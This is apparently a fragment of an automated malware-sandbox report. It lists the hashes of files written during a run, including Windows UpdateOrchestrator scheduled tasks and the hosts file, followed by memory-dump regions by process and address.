29011485f1d630352bb921d4227f40fef4f6ff2e816a903219cbe12c1582e71b4c1c66540e32291d760e6cafe5368e8ed3676164ef5a90d006c615cae26759f9

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
8abf2d6067c6f3191a015f84aa9b6efe

SHA1
98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

SHA256
ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

SHA512
c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/836-15-0x000001950D670000-0x000001950D678000-memory.dmp

Filesize
32KB

Download
memory/836-16-0x0000019527D30000-0x0000019527E96000-memory.dmp

Filesize
1.4MB

Download
memory/836-11-0x00007FF8E4330000-0x00007FF8E4DF1000-memory.dmp

Filesize
10.8MB

Download
memory/836-12-0x00007FF8E4330000-0x00007FF8E4DF1000-memory.dmp

Filesize
10.8MB

Download
memory/836-0-0x00007FF8E4333000-0x00007FF8E4335000-memory.dmp

Filesize
8KB

Download
memory/836-6-0x000001950D600000-0x000001950D622000-memory.dmp

Filesize
136KB

Download
memory/836-14-0x0000019527CB0000-0x0000019527D26000-memory.dmp

Filesize
472KB

Download
memory/836-13-0x000001950D6A0000-0x000001950D6E4000-memory.dmp

Filesize
272KB

Download
memory/836-46-0x00007FF8E4330000-0x00007FF8E4DF1000-memory.dmp

Filesize
10.8MB

Download
memory/892-106-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/1320-104-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/1412-110-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/1532-103-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/1852-109-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/1876-108-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/1992-98-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/2160-102-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/2292-374-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2292-375-0x0000000005320000-0x0000000005386000-memory.dmp

Filesize
408KB

Download
memory/2296-101-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/2360-99-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/2436-105-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/2508-95-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/2564-96-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/3312-100-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/3372-47-0x0000000002E10000-0x0000000002E3A000-memory.dmp

Filesize
168KB

Download
memory/3372-94-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/3852-160-0x0000027E68B70000-0x0000027E68C34000-memory.dmp

Filesize
784KB

Download
memory/3852-159-0x0000027E68670000-0x0000027E68678000-memory.dmp

Filesize
32KB

Download
memory/4792-97-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/4972-143-0x0000027E78300000-0x0000027E78354000-memory.dmp

Filesize
336KB

Download
memory/4972-370-0x0000027E785A0000-0x0000027E785D4000-memory.dmp

Filesize
208KB

Download
memory/5012-107-0x00007FF8C2950000-0x00007FF8C2960000-memory.dmp

Filesize
64KB

Download
memory/5024-350-0x0000024E35D80000-0x0000024E35D92000-memory.dmp

Filesize
72KB

Download
memory/5024-349-0x0000024E359D0000-0x0000024E359DA000-memory.dmp

Filesize
40KB

Download
memory/5024-244-0x0000024E35C50000-0x0000024E35D32000-memory.dmp

Filesize
904KB

Download
memory/5024-313-0x0000024E35DE0000-0x0000024E35DFE000-memory.dmp

Filesize
120KB

Download
memory/5024-312-0x0000024E35D30000-0x0000024E35D80000-memory.dmp

Filesize
320KB

Download